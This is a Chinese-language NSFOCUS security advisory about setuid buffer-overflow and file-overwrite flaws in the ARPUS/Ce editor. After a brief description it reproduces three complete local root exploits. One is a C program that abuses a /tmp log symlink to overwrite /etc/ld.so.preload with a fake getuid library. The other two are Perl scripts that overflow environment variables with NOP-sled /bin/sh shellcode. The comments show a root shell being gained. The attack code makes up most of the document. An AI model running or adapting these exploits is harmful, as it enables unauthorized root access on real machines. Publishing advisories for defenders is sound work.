NSFOCUS绿盟科技

首页 -> 安全研究

安全研究

安全漏洞

ARPUS/Ce setuid缓冲区溢出和文件覆盖漏洞

发布日期：2005-05-09
更新日期：2005-05-09

受影响系统：

Ce/Ceterm Ce/Ceterm 2.6

描述：

BUGTRAQ  ID: 13461

Ce/Ceterm（也被称为ARPUS/Ce）是一款集成的ascii文本编辑器和基于X-based终端模拟器。

Ce启动是会检查是否是ceterm。如果不是的话就会立即丢弃setuid，如果是ceterm的话就会在打开伪终端时丢弃setuid。但是Ce没能正确的处理丢弃权限，这样攻击者就可能滥用应用程序。

ARPUS/ce的几个getenv()调用存在缓冲区溢出。攻击者可以提供超长的XAPPLRESLANGPATH或XAPPLRESDIR导致分段错误。向ARPUS/ce发送超长的命令行参数也可以导致段错误。

此外，ARPUS/ce的日志工具也存在漏洞。在退出时程序会试图写入/tmp/ce_edit_log，然后对文件执行chmod 777。如果能够不受限访问该程序的话就可以导致覆盖文件，以root执行chmod。

<*来源：Kevin Finisterre （dotslash@snosoft.com）
        Robert E. Styma

  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=111505764425878&w=2
*>

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

["ex_ceterm.c" (text/plain)]

/*
* Copyright Kevin Finisterre - ripped from my perl_ex.c
*
* ** DISCLAIMER ** I am in no way responsible for your stupidity.
* ** DISCLAIMER ** I am in no way liable for any damages caused by compilation and \
                or execution of this code.
*
* ** WARNING ** DO NOT RUN THIS UNLESS YOU KNOW WHAT YOU ARE DOING ***
* ** WARNING ** overwriting /etc/ld.so.preload can severly fuck up your box (or \
                someone elses).
* ** WARNING ** have a boot disk ready incase some thing goes wrong.
*
* Setuid ARPUS/ce exploit by KF - kf_lists[at]digitalmunition[dot]com - 4/21/05
*
* kfinisterre@kfinisterre01:~$ ls -al /usr/bin/ce
* -rwsr-xr-x  1 root bin 630010 Sep 27  2004 /usr/bin/ce
*
* Tested against http://168.158.26.15/ce/ce-0260-intel-pentium-linux-fedoracore3.tar. \
                gz
*  and ce-0254-intel-pentium-linux-redhat73.tar.Z
*
* (16:34:04) kfin80: this program is tricky
* (16:34:14) kfin80: it drops privs under certain conditions
* (16:34:20) kfin80: it was fucking me up for a second. =]
* (16:36:02) kfin80: kfinisterre@kfinisterre01:~$ ce a a
* (16:36:13) kfin80: kfinisterre@kfinisterre01:~$ ls -al /tmp/ce_edit_log
* -rwxrwxrwx  1 kfinisterre kfinisterre 6594 Apr 21 16:35 /tmp/ce_edit_log
* (16:36:16) kfin80: owned by ME
* (16:36:36) kfin80: kfinisterre@kfinisterre01:~$ export DISPLAY=yamom
* kfinisterre@kfinisterre01:~$ rm /tmp/ce_edit_log
* kfinisterre@kfinisterre01:~$ ce a a
* ce: cannot connect to X server yamom (Success)
* kfinisterre@kfinisterre01:~$ ls -al /tmp/ce_edit_log
* -rwxrwxrwx  1 root kfinisterre 107 Apr 21 16:36 /tmp/ce_edit_log
* (16:36:38) d4yj4y: hmmmmmm
* (16:36:38) kfin80: owned by root
* (16:36:49) kfin80: the export of a faulty display makes it NOT drop privs.
*
*/

#define PRELOAD "/etc/ld.so.preload"
#include <stdio.h>
#include <strings.h>

int main(int *argc, char **argv)
{

        FILE *getuid;
        if(!(getuid = fopen("/tmp/getuid.c","w+"))) {
                printf("error opening file\n");
                exit(1);
        }

    fprintf(getuid, "int getuid(){return 0;}\n" );
        fclose(getuid);

        system("cc -fPIC -Wall -g -O2 -shared -o /tmp/getuid.so /tmp/getuid.c -lc");

    symlink(PRELOAD,"/tmp/ce_edit_log");
        umask(001); // I'm rw-rw-rw james bitch!

    putenv("DISPLAY=dmr0x!");  // GIMME ROOT BITCH!
        system("/usr/bin/ce");
        FILE *ld_so_preload;

        char preload[] = {
                "/tmp/getuid.so\n"
        };

        if(!(ld_so_preload = fopen(PRELOAD,"w+"))) {
                printf("error opening file\n");
                exit(1);
        }
        fwrite(preload,sizeof(preload)-1,1,ld_so_preload);
        fclose(ld_so_preload);
}

["ce_ex.pl" (text/plain)]

#!/usr/bin/perl -w
#
# Setuid ARPUS/ce exploit by KF - kf_lists[at]digitalmunition[dot]com - 4/21/05
#
# Copyright Kevin Finisterre
# kfinisterre@threat:/tmp$ ./ce_ex.pl
# sh-2.05b# id
# uid=0(root) gid00(kfinisterre)
# groups (dialout),24(cdrom),25(floppy),29(audio),44(video),1000(kfinisterre)
#

# 57 bytes long
$sc  = "\x90"x512;
$sc .= "\x31\xd2\x31\xc9\x31\xdb\x31\xc0\xb0\xa4\xcd\x80";
$sc .= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b";
$sc .= "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd";
$sc .= "\x80\xe8\xdc\xff\xff\xff/bin/sh";

$buf = "\x90" x (4120-569);
$buf .= $sc;
$buf .= (pack("l",(0xbfffa187)) x2);

$ENV{"XAPPLRESLANGPATH"} = $buf;

exec("/usr/bin/ce-0260-fc3");  # Attention Skript kiddies... change this

["ce_ex2.pl" (text/plain)]

#!/usr/bin/perl -w
#
# Setuid ARPUS/ce exploit by KF - kf_lists[at]digitalmunition[dot]com - 4/21/05
#
# Copyright Kevin Finisterre
# kfinisterre@threat:/tmp$ ./ce_ex.pl
# sh-2.05b# id
# uid=0(root) gid00(kfinisterre)
# groups (dialout),24(cdrom),25(floppy),29(audio),44(video),1000(kfinisterre)
#

# 57 bytes long
$sc  = "\x90"x512;
$sc .= "\x31\xd2\x31\xc9\x31\xdb\x31\xc0\xb0\xa4\xcd\x80";
$sc .= "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b";
$sc .= "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd";
$sc .= "\x80\xe8\xdc\xff\xff\xff/bin/sh";

$buf = "\x90" x (4120-569);
$buf .= $sc;
$buf .= (pack("l",(0xbfffa187)) x2);

$ENV{"XAPPLRESDIR"} = $buf;

exec("/usr/bin/ce-0260-fc3");  # Change this...

建议：

临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 删除setuid。

厂商补丁：

Ce/Ceterm
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://168.158.26.15/ce/ce/ce.html

浏览次数：2820
严重程度：0（网友投票）

关于我们: 公司介绍; 公司荣誉; 公司新闻

联系我们: 公司总部; 分支机构; 海外机构

快速链接: 绿盟云; 绿盟威胁情报中心NTI; 技术博客